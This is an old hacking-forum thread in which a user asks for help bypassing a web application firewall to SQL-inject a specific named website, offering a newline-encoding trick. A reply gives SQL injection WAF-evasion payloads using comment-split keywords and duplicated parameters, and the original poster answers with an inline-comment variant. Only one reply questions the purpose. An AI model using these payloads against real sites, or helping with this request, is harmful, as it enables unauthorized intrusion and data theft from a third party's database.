Author Topic: passby WAF for help  (Read 356 times)

0 Members and 1 Guest are viewing this topic.

Offline p3ng

  • NULL
  • Posts: 2
  • Cookies: -1
    • View Profile
passby WAF for help
« on: October 30, 2014, 10:11:16 am »
A website with boring WAF, can't be injection

anyone interested?
URL:
http://dikee.net/textview.asp?id=663%OA

add %OA can passby one

Offline Nortcele

  • Knight
  • **
  • Posts: 211
  • Cookies: -42
  • █+█=██
    • View Profile
Re: passby WAF for help
« Reply #1 on: October 30, 2014, 12:29:09 pm »
Is there a reason why?

Besides messing with China...
~JaySec
~LulzBlog

TAKE A COOKIE!




0100000101010011010000110100100101001001

Offline 2d8

  • /dev/null
  • *
  • Posts: 17
  • Cookies: 1
    • View Profile
Re: passby WAF for help
« Reply #2 on: October 30, 2014, 01:06:09 pm »
Most of WAFs are based on signatures, so there are plenty of ways to modify request and bypass them.
e.g.:
Code: [Select]
/?id=1+union+select+1,2,3/* => /?id=1+un/**/ion+sel/**/ect+1,2,3--
/?id=1;select+1,2,3+from+users+where+id=1-- => /?id=1;select+1&id=2,3+from+users+where+id=1--

Offline p3ng

  • NULL
  • Posts: 2
  • Cookies: -1
    • View Profile
Re: passby WAF for help
« Reply #3 on: October 30, 2014, 01:18:20 pm »
I had tried mang methods,the method u provied isn't available

such as /*!sElecT*/,